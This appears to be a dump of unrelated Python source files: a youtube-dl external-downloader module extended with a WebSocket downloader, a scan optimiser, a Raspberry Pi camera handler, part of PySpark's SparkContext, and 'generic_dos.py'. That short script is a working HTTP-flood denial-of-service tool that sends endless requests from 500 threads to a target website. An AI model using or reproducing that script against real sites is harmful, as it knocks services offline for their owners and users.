self.get_basename(), retval))
return False
@classmethod
def get_basename(cls):
return cls.__name__[:-2].lower()
@property
def exe(self):
return self.params.get('external_downloader')
@classmethod
def available(cls):
return check_executable(cls.get_basename(), [cls.AVAILABLE_OPT])
@classmethod
def supports(cls, info_dict):
return info_dict['protocol'] in ('http', 'https', 'ftp', 'ftps')
@classmethod
def can_download(cls, info_dict):
return cls.available() and cls.supports(info_dict)
def _option(self, command_option, param):
return cli_option(self.params, command_option, param)
def _bool_option(self, command_option, param, true_value='true', false_value='false', separator=None):
return cli_bool_option(self.params, command_option, param, true_value, false_value, separator)
def _valueless_option(self, command_option, param, expected_value=True):
return cli_valueless_option(self.params, command_option, param, expected_value)
def _configuration_args(self, default=[]):
return cli_configuration_args(self.params, 'external_downloader_args', default)
def _call_downloader(self, tmpfilename, info_dict):
""" Either overwrite this or implement _make_cmd """
cmd = [encodeArgument(a) for a in self._make_cmd(tmpfilename, info_dict)]
self._debug_cmd(cmd)
p = subprocess.Popen(
cmd, stderr=subprocess.PIPE)
_, stderr = p.communicate()
if p.returncode != 0:
self.to_stderr(stderr.decode('utf-8', 'replace'))
return p.returncode
class CurlFD(ExternalFD):
AVAILABLE_OPT = '-V'
def _make_cmd(self, tmpfilename, info_dict):
cmd = [self.exe, '--location', '-o', tmpfilename]
for key, val in info_dict['http_headers'].items():
cmd += ['--header', '%s: %s' % (key, val)]
cmd += self._bool_option('--continue-at', 'continuedl', '-', '0')
cmd += self._valueless_option('--silent', 'noprogress')
cmd += self._valueless_option('--verbose', 'verbose')
cmd += self._option('--limit-rate', 'ratelimit')
retry = self._option('--retry', 'retries')
if len(retry) == 2:
if retry[1] in ('inf', 'infinite'):
retry[1] = '2147483647'
cmd += retry
cmd += self._option('--max-filesize', 'max_filesize')
cmd += self._option('--interface', 'source_address')
cmd += self._option('--proxy', 'proxy')
cmd += self._valueless_option('--insecure', 'nocheckcertificate')
cmd += self._configuration_args()
cmd += ['--', info_dict['url']]
return cmd
def _call_downloader(self, tmpfilename, info_dict):
cmd = [encodeArgument(a) for a in self._make_cmd(tmpfilename, info_dict)]
self._debug_cmd(cmd)
# curl writes the progress to stderr so don't capture it.
p = subprocess.Popen(cmd)
p.communicate()
return p.returncode
class AxelFD(ExternalFD):
AVAILABLE_OPT = '-V'
def _make_cmd(self, tmpfilename, info_dict):
cmd = [self.exe, '-o', tmpfilename]
for key, val in info_dict['http_headers'].items():
cmd += ['-H', '%s: %s' % (key, val)]
cmd += self._configuration_args()
cmd += ['--', info_dict['url']]
return cmd
class WgetFD(ExternalFD):
AVAILABLE_OPT = '--version'
def _make_cmd(self, tmpfilename, info_dict):
cmd = [self.exe, '-O', tmpfilename, '-nv', '--no-cookies']
for key, val in info_dict['http_headers'].items():
cmd += ['--header', '%s: %s' % (key, val)]
cmd += self._option('--limit-rate', 'ratelimit')
retry = self._option('--tries', 'retries')
if len(retry) == 2:
if retry[1] in ('inf', 'infinite'):
retry[1] = '0'
cmd += retry
cmd += self._option('--bind-address', 'source_address')
cmd += self._option('--proxy', 'proxy')
cmd += self._valueless_option('--no-check-certificate', 'nocheckcertificate')
cmd += self._configuration_args()
cmd += ['--', info_dict['url']]
return cmd
class Aria2cFD(ExternalFD):
AVAILABLE_OPT = '-v'
def _make_cmd(self, tmpfilename, info_dict):
cmd = [self.exe, '-c']
cmd += self._configuration_args([
'--min-split-size', '1M', '--max-connection-per-server', '4'])
dn = os.path.dirname(tmpfilename)
if dn:
cmd += ['--dir', dn]
cmd += ['--out', os.path.basename(tmpfilename)]
for key, val in info_dict['http_headers'].items():
cmd += ['--header', '%s: %s' % (key, val)]
cmd += self._option('--interface', 'source_address')
cmd += self._option('--all-proxy', 'proxy')
cmd += self._bool_option('--check-certificate', 'nocheckcertificate', 'false', 'true', '=')
cmd += self._bool_option('--remote-time', 'updatetime', 'true', 'false', '=')
cmd += ['--', info_dict['url']]
return cmd
class HttpieFD(ExternalFD):
@classmethod
def available(cls):
return check_executable('http', ['--version'])
def _make_cmd(self, tmpfilename, info_dict):
cmd = ['http', '--download', '--output', tmpfilename, info_dict['url']]
for key, val in info_dict['http_headers'].items():
cmd += ['%s:%s' % (key, val)]
return cmd
class WebSocketAppDownloader(websocket.WebSocketApp):
outputfile=None
def setOutputFile(self,output):
outputfile=output;
def on_error_downloader(wsr, error):
print(error)
def on_close_downloader(wsr,close_status_code, close_reason):
print( close_reason)
print( close_status_code)
wsr.outputfile.close();
print("### closed ###")
def on_message_downloader(wsr, message):
if not (message[0]=='{' and message[len(message)-1]=='}') :
wsr.outputfile.write(message);
#
# try:
# foki = bytes(message, 'utf-8');
# #message.startswith('{"eventType')
# except:
class WebSocketFD(ExternalFD):
@classmethod
def supports(cls, info_dict):
return info_dict['protocol'] in ('wss')
@classmethod
def available(cls):
return FFmpegPostProcessor().available
def _call_downloader(self, tmpfilename, info_dict):
wsurl = info_dict['url']
protocol = info_dict.get('protocol');# useless as protocol wan be anything
auxprotocols = info_dict.get('auxprotocols')# other wss protocols contiaining (url and callbacks)
wsauxapps=[];
if auxprotocols:
for auxproto in auxprotocols:
wsapp = websocket.WebSocketApp(wsurl,
header=auxproto.headers,
on_open=auxproto.on_open,
on_message=auxproto.on_message,
on_error=auxproto.on_error,
on_close=auxproto.on_close)
wsauxapps.append(wsapp);
for wsapp in wsauxapps:
def arun(*args):
wsapp.run_forever()
Thread(target=arun).start()
args=[]
for log_level in ('quiet', 'verbose'):
if self.params.get(log_level, False):
args += ['-loglevel', log_level]
break
seekable = info_dict.get('_seekable')
if seekable is not None:
# setting -seekable prevents ffmpeg from guessing if the server
# supports seeking(by adding the header `Range: bytes=0-`), which
# can cause problems in some cases
# https://github.com/ytdl-org/youtube-dl/issues/11800#issuecomment-275037127
# http://trac.ffmpeg.org/ticket/6125#comment:10
args += ['-seekable', '1' if seekable else '0']
args += self._configuration_args()
# start_time = info_dict.get('start_time') or 0
# if start_time:
# args += ['-ss', compat_str(start_time)]
# end_time = info_dict.get('end_time')
# if end_time:
# args += ['-t', compat_str(end_time - start_time)]
if info_dict['http_headers'] and re.match(r'^https?://', wsurl):
# Trailing \r\n after each HTTP header is important to prevent warning from ffmpeg/avconv:
# [http @ 00000000003d2fa0] No trailing CRLF found in HTTP header.
headers = handle_youtubedl_headers(info_dict['http_headers'])
args += [
'-headers',
''.join('%s: %s\r\n' % (key, val) for key, val in headers.items())]
env = None
proxy = self.params.get('proxy')
if proxy:
if not re.match(r'^[\da-zA-Z]+://', proxy):
proxy = 'http://%s' % proxy
if proxy.startswith('socks'):
self.report_warning(
'%s does not support SOCKS proxies. Downloading is likely to fail. '
'Consider adding --hls-prefer-native to your command.' % self.get_basename())
# Since December 2015 ffmpeg supports -http_proxy option (see
# http://git.videolan.org/?p=ffmpeg.git;a=commit;h=b4eb1f29ebddd60c41a2eb39f5af701e38e0d3fd)
# We could switch to the following code if we are able to detect version properly
# args += ['-http_proxy', proxy]
env = os.environ.copy()
compat_setenv('HTTP_PROXY', proxy, env=env)
compat_setenv('http_proxy', proxy, env=env)
protocol = info_dict.get('protocol')
if protocol == 'rtmp':
player_url = info_dict.get('player_url')
page_url = info_dict.get('page_url')
app = info_dict.get('app')
play_path = info_dict.get('play_path')
tc_url = info_dict.get('tc_url')
flash_version = info_dict.get('flash_version')
live = info_dict.get('rtmp_live', False)
conn = info_dict.get('rtmp_conn')
if player_url is not None:
args += ['-rtmp_swfverify', player_url]
if page_url is not None:
args += ['-rtmp_pageurl', page_url]
if app is not None:
args += ['-rtmp_app', app]
if play_path is not None:
args += ['-rtmp_playpath', play_path]
if tc_url is not None:
args += ['-rtmp_tcurl', tc_url]
if flash_version is not None:
args += ['-rtmp_flashver', flash_version]
if live:
args += ['-rtmp_live', 'live']
if isinstance(conn, list):
for entry in conn:
args += ['-rtmp_conn', entry]
elif isinstance(conn, compat_str):
args += ['-rtmp_conn', conn]
args += ['-i', wsurl, '-c', 'copy']
if self.params.get('test', False):
args += ['-fs', compat_str(self._TEST_FILE_SIZE)]
# if protocol in ('m3u8', 'm3u8_native'):
# if self.params.get('hls_use_mpegts', False) or tmpfilename == '-':
# args += ['-f', 'mpegts']
# else:
# args += ['-f', 'mp4']
# if (ffpp.basename == 'ffmpeg' and is_outdated_version(ffpp._versions['ffmpeg'], '3.2', False)) and (not info_dict.get('acodec') or info_dict['acodec'].split('.')[0] in ('aac', 'mp4a')):
# args += ['-bsf:a', 'aac_adtstoasc']
# elif protocol == 'rtmp':
# args += ['-f', 'flv']
# else:
# args += ['-f', EXT_TO_OUT_FORMATS.get(info_dict['ext'], info_dict['ext'])]
#
# args = [encodeArgument(opt) for opt in args]
# args.append(encodeFilename(ffpp._ffmpeg_filename_argument(tmpfilename), True))
self._debug_cmd(args)
#websocket.enableTrace(True)
wsappmain = WebSocketAppDownloader(wsurl,header=
["User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0",
"Accept: */*",
"Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding: gzip, deflate, br",
#"Sec-WebSocket-Version: 13",
#"Origin: https://www.livejasmin.com",
#"Sec-WebSocket-Extensions: permessage-deflate",
#"Sec-WebSocket-Key: gsVFAaMTdf8HW8pI/f9FhA==",
"Connection: keep-alive, Upgrade",
"Sec-Fetch-Dest: websocket",
"Sec-Fetch-Mode: websocket",
"Sec-Fetch-Site: cross-site",
"Pragma: no-cache",
"Cache-Control: no-cache",
"Upgrade: websocket"])
wsappmain.outputfile = open(tmpfilename, 'wb')
if info_dict.get('on_open'):
wsappmain.on_open=info_dict['on_open'];
if info_dict.get('on_error'):
wsappmain.on_error=info_dict['on_error'];
else:
wsappmain.on_error=on_error_downloader;
if info_dict.get('on_close'):
wsappmain.on_close=info_dict['on_close'];
else:
wsappmain.on_close=on_close_downloader;
if info_dict.get('on_message'):
wsappmain.on_message=info_dict['on_message'];
else:
wsappmain.on_message=on_message_downloader;
#wsappmain.on_open =info_dict['on_open']
# def darun(*args):
# Thread(target=darun).start()
try:
wsappmain.run_forever()
except :
# subprocces.run would send the SIGKILL signal to ffmpeg and the
# mp4 file couldn't be played, but if we ask ffmpeg to quit it
# produces a file that is playable (this is mostly useful for live
# streams). Note that Windows is not affected and produces playable
# files (see https://github.com/ytdl-org/youtube-dl/issues/8300).
self.to_stderr('wsappmain closed')
#raise
return True
class FFmpegFD(ExternalFD):
@classmethod
def supports(cls, info_dict):
return info_dict['protocol'] in ('http', 'https', 'ftp', 'ftps', 'm3u8', 'rtsp', 'rtmp', 'mms')
@classmethod
def available(cls):
return FFmpegPostProcessor().available
def _call_downloader(self, tmpfilename, info_dict):
url = info_dict['url']
ffpp = FFmpegPostProcessor(downloader=self)
if not ffpp.available:
self.report_error('m3u8 download detected but ffmpeg or avconv could not be found. Please install one.')
return False
ffpp.check_version()
args = [ffpp.executable, '-y']
for log_level in ('quiet', 'verbose'):
if self.params.get(log_level, False):
args += ['-loglevel', log_level]
break
seekable = info_dict.get('_seekable')
if seekable is not None:
# setting -seekable prevents ffmpeg from guessing if the server
# supports seeking(by adding the header `Range: bytes=0-`), which
# can cause problems in some cases
# https://github.com/ytdl-org/youtube-dl/issues/11800#issuecomment-275037127
# http://trac.ffmpeg.org/ticket/6125#comment:10
args += ['-seekable', '1' if seekable else '0']
args += self._configuration_args()
# start_time = info_dict.get('start_time') or 0
# if start_time:
# args += ['-ss', compat_str(start_time)]
# end_time = info_dict.get('end_time')
# if end_time:
# args += ['-t', compat_str(end_time - start_time)]
if info_dict['http_headers'] and re.match(r'^https?://', url):
# Trailing \r\n after each HTTP header is important to prevent warning from ffmpeg/avconv:
# [http @ 00000000003d2fa0] No trailing CRLF found in HTTP header.
headers = handle_youtubedl_headers(info_dict['http_headers'])
args += [
'-headers',
''.join('%s: %s\r\n' % (key, val) for key, val in headers.items())]
env = None
proxy = self.params.get('proxy')
if proxy:
if not re.match(r'^[\da-zA-Z]+://', proxy):
proxy = 'http://%s' % proxy
if proxy.startswith('socks'):
self.report_warning(
'%s does not support SOCKS proxies. Downloading is likely to fail. '
'Consider adding --hls-prefer-native to your command.' % self.get_basename())
# Since December 2015 ffmpeg supports -http_proxy option (see
# http://git.videolan.org/?p=ffmpeg.git;a=commit;h=b4eb1f29ebddd60c41a2eb39f5af701e38e0d3fd)
# We could switch to the following code if we are able to detect version properly
# args += ['-http_proxy', proxy]
env = os.environ.copy()
compat_setenv('HTTP_PROXY', proxy, env=env)
compat_setenv('http_proxy', proxy, env=env)
protocol = info_dict.get('protocol')
if protocol == 'rtmp':
player_url = info_dict.get('player_url')
page_url = info_dict.get('page_url')
app = info_dict.get('app')
play_path = info_dict.get('play_path')
tc_url = info_dict.get('tc_url')
flash_version = info_dict.get('flash_version')
live = info_dict.get('rtmp_live', False)
conn = info_dict.get('rtmp_conn')
if player_url is not None:
args += ['-rtmp_swfverify', player_url]
if page_url is not None:
args += ['-rtmp_pageurl', page_url]
if app is not None:
args += ['-rtmp_app', app]
if play_path is not None:
args += ['-rtmp_playpath', play_path]
if tc_url is not None:
args += ['-rtmp_tcurl', tc_url]
if flash_version is not None:
args += ['-rtmp_flashver', flash_version]
if live:
args += ['-rtmp_live', 'live']
if isinstance(conn, list):
for entry in conn:
args += ['-rtmp_conn', entry]
elif isinstance(conn, compat_str):
args += ['-rtmp_conn', conn]
args += ['-i', url, '-c', 'copy']
if self.params.get('test', False):
args += ['-fs', compat_str(self._TEST_FILE_SIZE)]
if protocol in ('m3u8', 'm3u8_native'):
if self.params.get('hls_use_mpegts', False) or tmpfilename == '-':
args += ['-f', 'mpegts']
else:
args += ['-f', 'mp4']
if (ffpp.basename == 'ffmpeg' and is_outdated_version(ffpp._versions['ffmpeg'], '3.2', False)) and (not info_dict.get('acodec') or info_dict['acodec'].split('.')[0] in ('aac', 'mp4a')):
args += ['-bsf:a', 'aac_adtstoasc']
elif protocol == 'rtmp':
args += ['-f', 'flv']
else:
args += ['-f', EXT_TO_OUT_FORMATS.get(info_dict['ext'], info_dict['ext'])]
args = [encodeArgument(opt) for opt in args]
args.append(encodeFilename(ffpp._ffmpeg_filename_argument(tmpfilename), True))
self._debug_cmd(args)
proc = subprocess.Popen(args, stdin=subprocess.PIPE, env=env)
try:
retval = proc.wait()
except KeyboardInterrupt:
# subprocces.run would send the SIGKILL signal to ffmpeg and the
# mp4 file couldn't be played, but if we ask ffmpeg to quit it
# produces a file that is playable (this is mostly useful for live
# streams). Note that Windows is not affected and produces playable
# files (see https://github.com/ytdl-org/youtube-dl/issues/8300).
if sys.platform != 'win32':
proc.communicate(b'q')
raise
return retval
class AVconvFD(FFmpegFD):
pass
_BY_NAME = dict(
(klass.get_basename(), klass)
for name, klass in globals().items()
if name.endswith('FD') and name != 'ExternalFD'
)
def list_external_downloaders():
return sorted(_BY_NAME.keys())
def get_external_downloader(external_downloader):
""" Given the name of the executable, see whether we support the given
downloader . """
# Drop .exe extension on Windows
bn = os.path.splitext(os.path.basename(external_downloader))[0]
return _BY_NAME[bn]
|
scanning.py
|
"""Multidimensional Simple Scan method for Minimization."""
from threading import Thread as _Thread
import numpy as _np
class SimpleScan:
"""."""
@property
def ndim(self):
"""."""
return self._ndim
@ndim.setter
def ndim(self, value):
"""."""
self._ndim = value
@property
def position(self):
"""."""
return self._position
@position.setter
def position(self, value):
"""."""
self._position = value
def __init__(self):
"""."""
self._lower_limits = _np.array([])
self._upper_limits = _np.array([])
self._ndim = 0
self._position = _np.array([])
self._delta = _np.array([])
self._curr_dim = 0
self._stop = False
self._thread = _Thread(target=self._optimize, daemon=True)
self.initialization()
def initialization(self):
"""."""
raise NotImplementedError
def calc_obj_fun(self):
"""Return arrays with dimension of search space."""
raise NotImplementedError
def set_limits(self, upper=None, lower=None):
"""."""
self._upper_limits = upper
self._lower_limits = lower
self.ndim = len(upper)
def start(self):
"""."""
if not self._thread.is_alive():
self._stop = False
self._thread = _Thread(target=self._optimize, daemon=True)
self._thread.start()
def stop(self):
"""."""
self._stop = True
@property
def isrunning(self):
"""."""
return self._thread.is_alive()
def _optimize(self, npoints):
"""."""
self._delta = _np.zeros(npoints)
func = _np.zeros(self._ndim)
best = _np.zeros(self._ndim)
for i in range(self._ndim):
self._delta = _np.linspace(
self._lower_limits[i], self._upper_limits[i], npoints)
self._curr_dim = i
func[i], best[i] = self.calc_obj_fun()
self._position[i] = best[i]
print('Best result is: ' + str(best))
print('Figure of merit is: ' + str(_np.min(func)))
|
CameraHandler.py
|
import time
from picamera import PiCamera
from picamera.array import PiRGBArray
import threading
import multiprocessing
import struct
from Queue import Queue
from datetime import datetime
import logging
import numpy as np
import os
class CameraHandler(multiprocessing.Process):
m = multiprocessing.Manager()
queueHandler = m.Queue()
running = False
noOfPhotosPerCMD = 1
def __init__(self, queueJob, header, sendCam, runID, algoVer):
self.algoVer = algoVer
self.runID = runID
self.sendCam = sendCam
self.logger = logging.getLogger(__name__)
multiprocessing.Process.__init__(self)
self.header = header
self.queueJob = queueJob
self.logger.info("CameraManager started")
self.daemon = True
self.start()
def run(self):
self.camera = PiCamera()
self.camera.framerate = 30
self.camera.image_effect = "denoise"
self.camera.exposure_mode = "antishake"
self.camera.start_preview()
self.logger.info("Warming up camera...")
t3 = threading.Thread(target=self.handleProcessor, args=())
t3.start()
t3.join()
def getPacketHeader(self):
return self.header
def handleProcessor(self):
while True:
if self.queueHandler.qsize() != 0:
print("In If statement")
packet = "R:cam:2:18:1"
print(packet)
if packet.split(":")[0] != "R" and packet.split(":")[1] != "cam":
print("error in packet")
self.logger.error("packet with error, skip this packet" + packet)
self.queueHandler.task_done()
else:
print("Cam packet received")
try:
print(packet)
x, y, direction = (
packet.split(":")[2],
packet.split(":")[3],
packet.split(":")[4].strip(),
)
self.logger.info(
"[raspberry] camera is dealing with" + packet + " - right now"
)
if self.running:
self.logger.warn(
"[raspberry][warning] cam still busy, packet ignored"
)
elif not self.running:
self.running = True
if self.algoVer == 1:
for i in range(self.noOfPhotosPerCMD):
now = datetime.now()
fileNameCustom = (
"checklist-images/"
+ now.strftime("%Y%m%d_%H%M%S")
+ "-"
+ x
+ "_"
+ y
+ "_"
+ direction
+ "_("
+ str(i)
+ ").jpg"
)
fileCustom = open(fileNameCustom, "wb")
fileCustom.close()
self.camera.capture(fileNameCustom)
self.logger.info(
"[raspberry] taken %s" % fileNameCustom
)
newFilePath = fileNameCustom.replace("-temp", "")
os.rename(fileNameCustom, newFilePath)
self.logger.info("[raspberry] changing to %s" % newFilePath)
elif self.algoVer == 2:
now = datetime.now()
filepath = (
"checklist-images/"
+ now.strftime("%Y%m%d_%H%M%S")
+ ".jpg"
)
fileCustom = open(filepath, "wb")
self.camera.capture(fileCustom, "jpeg")
fileCustom.close()
self.logger.info("[raspberry] taken %s" % filepath)
self.queueJob.put(
self.header
+ ":D:save_image:"
+ filepath
+ ":"
+ x
+ ":"
+ y
+ ":"
+ direction
)
self.running = False
except Exception as e:
self.logger.error("[raspberry][error] " + str(e))
self.logger.info("error so skip this image")
finally:
self.running = False
if self.sendCam:
self.queueJob.put(self.header + ":A:cam_ok")
def handle(self, packet):
self.queueHandler.put(packet)
|
generic_dos.py
|
#!/usr/bin/python3
# author Diego Rodrรญguez Riera
# from https://github.com/riera90/scripts
# licenced under BSD 3-Clause License
# date 18/02/19
# Intended to use on websites, what else would you use this for...
import requests
import re
import json
import threading
import time
import os
################################################################################
############################### Configuration ##################################
################################################################################
number_of_threads = 500
# target login
target = "http://www.site.com"
# target username and password input
################################################################################
########################### end of Configuration ###############################
################################################################################
# this function tests a series of passwords
def make_request():
# creates the session (mainly to store cookies1)
bot = requests.session()
thread_name = threading.currentThread().getName()
# here we go
while True:
# makes the GET
bot.get(url = target)
# creates the threads
print("initializing threads.")
threads = []
for i in range(number_of_threads):
t = threading.Thread(target=make_request, name='thread '+str(i))
threads.append(t)
# launches the threads
for thread in threads:
thread.start()
time.sleep(2)
# joins the threads
for thread in threads:
thread.join()
|
context.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import os
import shutil
import signal
import sys
import threading
import warnings
from threading import RLock
from tempfile import NamedTemporaryFile
from py4j.protocol import Py4JError
from pyspark import accumulators
from pyspark.accumulators import Accumulator
from pyspark.broadcast import Broadcast, BroadcastPickleRegistry
from pyspark.conf import SparkConf
from pyspark.files import SparkFiles
from pyspark.java_gateway import launch_gateway
from pyspark.serializers import PickleSerializer, BatchedSerializer, UTF8Deserializer, \
PairDeserializer, AutoBatchedSerializer, NoOpSerializer
from pyspark.storagelevel import StorageLevel
from pyspark.rdd import RDD, _load_from_socket, ignore_unicode_prefix
from pyspark.traceback_utils import CallSite, first_spark_call
from pyspark.status import StatusTracker
from pyspark.profiler import ProfilerCollector, BasicProfiler
if sys.version > '3':
xrange = range
__all__ = ['SparkContext']
# These are special default configs for PySpark, they will overwrite
# the default ones for Spark if they are not configured by user.
DEFAULT_CONFIGS = {
"spark.serializer.objectStreamReset": 100,
"spark.rdd.compress": True,
}
class SparkContext(object):
"""
Main entry point for Spark functionality. A SparkContext represents the
connection to a Spark cluster, and can be used to create L{RDD} and
broadcast variables on that cluster.
"""
_gateway = None
_jvm = None
_next_accum_id = 0
_active_spark_context = None
_lock = RLock()
_python_includes = None # zip and egg files that need to be added to PYTHONPATH
PACKAGE_EXTENSIONS = ('.zip', '.egg', '.jar')
def __init__(self, master=None, appName=None, sparkHome=None, pyFiles=None,
environment=None, batchSize=0, serializer=PickleSerializer(), conf=None,
gateway=None, jsc=None, profiler_cls=BasicProfiler):
"""
Create a new SparkContext. At least the master and app name should be set,
either through the named parameters here or through C{conf}.
:param master: Cluster URL to connect to
(e.g. mesos://host:port, spark://host:port, local[4]).
:param appName: A name for your job, to display on the cluster web UI.
:param sparkHome: Location where Spark is installed on cluster nodes.
:param pyFiles: Collection of .zip or .py files to send to the cluster
and add to PYTHONPATH. These can be paths on the local file
system or HDFS, HTTP, HTTPS, or FTP URLs.
:param environment: A dictionary of environment variables to set on
worker nodes.
:param batchSize: The number of Python objects represented as a single
Java object. Set 1 to disable batching, 0 to automatically choose
the batch size based on object sizes, or -1 to use an unlimited
batch size
:param serializer: The serializer for RDDs.
:param conf: A L{SparkConf} object setting Spark properties.
:param gateway: Use an existing gateway and JVM, otherwise a new JVM
will be instantiated.
:param jsc: The JavaSparkContext instance (optional).
:param profiler_cls: A class of custom Profiler used to do profiling
(default is pyspark.profiler.BasicProfiler).
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> sc2 = SparkContext('local', 'test2') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
"""
self._callsite = first_spark_call() or CallSite(None, None, None)
SparkContext._ensure_initialized(self, gateway=gateway, conf=conf)
try:
self._do_init(master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls)
except:
# If an error occurs, clean up in order to allow future SparkContext creation:
self.stop()
raise
def _do_init(self, master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls):
self.environment = environment or {}
# java gateway must have been launched at this point.
if conf is not None and conf._jconf is not None:
# conf has been initialized in JVM properly, so use conf directly. This represents the
# scenario that JVM has been launched before SparkConf is created (e.g. SparkContext is
# created and then stopped, and we create a new SparkConf and new SparkContext again)
self._conf = conf
else:
self._conf = SparkConf(_jvm=SparkContext._jvm)
if conf is not None:
for k, v in conf.getAll():
self._conf.set(k, v)
self._batchSize = batchSize # -1 represents an unlimited batch size
self._unbatched_serializer = serializer
if batchSize == 0:
self.serializer = AutoBatchedSerializer(self._unbatched_serializer)
else:
self.serializer = BatchedSerializer(self._unbatched_serializer,
batchSize)
# Set any parameters passed directly to us on the conf
if master:
self._conf.setMaster(master)
if appName:
self._conf.setAppName(appName)
if sparkHome:
self._conf.setSparkHome(sparkHome)
if environment:
for key, value in environment.items():
self._conf.setExecutorEnv(key, value)
for key, value in DEFAULT_CONFIGS.items():
self._conf.setIfMissing(key, value)
# Check that we have at least the required parameters
if not self._conf.contains("spark.master"):
raise Exception("A master URL must be set in your configuration")
if not self._conf.contains("spark.app.name"):
raise Exception("An application name must be set in your configuration")
# Read back our properties from the conf in case we loaded some of them from
# the classpath or an external config file
self.master = self._conf.get("spark.master")
self.appName = self._conf.get("spark.app.name")
self.sparkHome = self._conf.get("spark.home", None)
for (k, v) in self._conf.getAll():
if k.startswith("spark.executorEnv."):
varName = k[len("spark.executorEnv."):]
self.environment[varName] = v
self.environment["PYTHONHASHSEED"] = os.environ.get("PYTHONHASHSEED", "0")
# Create the Java SparkContext through Py4J
self._jsc = jsc or self._initialize_context(self._conf._jconf)
# Reset the SparkConf to the one actually used by the SparkContext in JVM.
self._conf = SparkConf(_jconf=self._jsc.sc().conf())
# Create a single Accumulator in Java that we'll send all our updates through;
# they will be passed back to us through a TCP server
auth_token = self._gateway.gateway_parameters.auth_token
self._accumulatorServer = accumulators._start_update_server(auth_token)
(host, port) = self._accumulatorServer.server_address
self._javaAccumulator = self._jvm.PythonAccumulatorV2(host, port, auth_token)
self._jsc.sc().register(self._javaAccumulator)
self.pythonExec = os.environ.get("PYSPARK_PYTHON", 'python')
self.pythonVer = "%d.%d" % sys.version_info[:2]
# Broadcast's __reduce__ method stores Broadcast instances here.
# This allows other code to determine which Broadcast instances have
# been pickled, so it can determine which Java broadcast objects to
# send.
self._pickled_broadcast_vars = BroadcastPickleRegistry()
SparkFiles._sc = self
root_dir = SparkFiles.getRootDirectory()
sys.path.insert(1, root_dir)
# Deploy any code dependencies specified in the constructor
self._python_includes = list()
for path in (pyFiles or []):
self.addPyFile(path)
# Deploy code dependencies set by spark-submit; these will already have been added
# with SparkContext.addFile, so we just need to add them to the PYTHONPATH
for path in self._conf.get("spark.submit.pyFiles", "").split(","):
if path != "":
(dirname, filename) = os.path.split(path)
try:
filepath = os.path.join(SparkFiles.getRootDirectory(), filename)
if not os.path.exists(filepath):
# In case of YARN with shell mode, 'spark.submit.pyFiles' files are
# not added via SparkContext.addFile. Here we check if the file exists,
# try to copy and then add it to the path. See SPARK-21945.
shutil.copyfile(path, filepath)
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
sys.path.insert(1, filepath)
except Exception:
warnings.warn(
"Failed to add file [%s] speficied in 'spark.submit.pyFiles' to "
"Python path:\n %s" % (path, "\n ".join(sys.path)),
RuntimeWarning)
# Create a temporary directory inside spark.local.dir:
local_dir = self._jvm.org.apache.spark.util.Utils.getLocalDir(self._jsc.sc().conf())
self._temp_dir = \
self._jvm.org.apache.spark.util.Utils.createTempDir(local_dir, "pyspark") \
.getAbsolutePath()
# profiling stats collected for each PythonRDD
if self._conf.get("spark.python.profile", "false") == "true":
dump_path = self._conf.get("spark.python.profile.dump", None)
self.profiler_collector = ProfilerCollector(profiler_cls, dump_path)
else:
self.profiler_collector = None
# create a signal handler which would be invoked on receiving SIGINT
def signal_handler(signal, frame):
self.cancelAllJobs()
raise KeyboardInterrupt()
# see http://stackoverflow.com/questions/23206787/
if isinstance(threading.current_thread(), threading._MainThread):
signal.signal(signal.SIGINT, signal_handler)
def __repr__(self):
return "<SparkContext master={master} appName={appName}>".format(
master=self.master,
appName=self.appName,
)
def _repr_html_(self):
return """
<div>
<p><b>SparkContext</b></p>
<p><a href="{sc.uiWebUrl}">Spark UI</a></p>
<dl>
<dt>Version</dt>
<dd><code>v{sc.version}</code></dd>
<dt>Master</dt>
<dd><code>{sc.master}</code></dd>
<dt>AppName</dt>
<dd><code>{sc.appName}</code></dd>
</dl>
</div>
""".format(
sc=self
)
def _initialize_context(self, jconf):
"""
Initialize SparkContext in function to allow subclass specific initialization
"""
return self._jvm.JavaSparkContext(jconf)
@classmethod
def _ensure_initialized(cls, instance=None, gateway=None, conf=None):
"""
Checks whether a SparkContext is initialized or not.
Throws error if a SparkContext is already running.
"""
with SparkContext._lock:
if not SparkContext._gateway:
SparkContext._gateway = gateway or launch_gateway(conf)
SparkContext._jvm = SparkContext._gateway.jvm
if instance:
if (SparkContext._active_spark_context and
SparkContext._active_spark_context != instance):
currentMaster = SparkContext._active_spark_context.master
currentAppName = SparkContext._active_spark_context.appName
callsite = SparkContext._active_spark_context._callsite
# Raise error if there is already a running Spark context
raise ValueError(
"Cannot run multiple SparkContexts at once; "
"existing SparkContext(app=%s, master=%s)"
" created by %s at %s:%s "
% (currentAppName, currentMaster,
callsite.function, callsite.file, callsite.linenum))
else:
SparkContext._active_spark_context = instance
def __getnewargs__(self):
# This method is called when attempting to pickle SparkContext, which is always an error:
raise Exception(
"It appears that you are attempting to reference SparkContext from a broadcast "
"variable, action, or transformation. SparkContext can only be used on the driver, "
"not in code that it run on workers. For more information, see SPARK-5063."
)
def __enter__(self):
"""
Enable 'with SparkContext(...) as sc: app(sc)' syntax.
"""
return self
def __exit__(self, type, value, trace):
"""
Enable 'with SparkContext(...) as sc: app' syntax.
Specifically stop the context on exit of the with block.
"""
self.stop()
@classmethod
def getOrCreate(cls, conf=None):
"""
Get or instantiate a SparkContext and register it as a singleton object.
:param conf: SparkConf (optional)
"""
with SparkContext._lock:
if SparkContext._active_spark_context is None:
SparkContext(conf=conf or SparkConf())
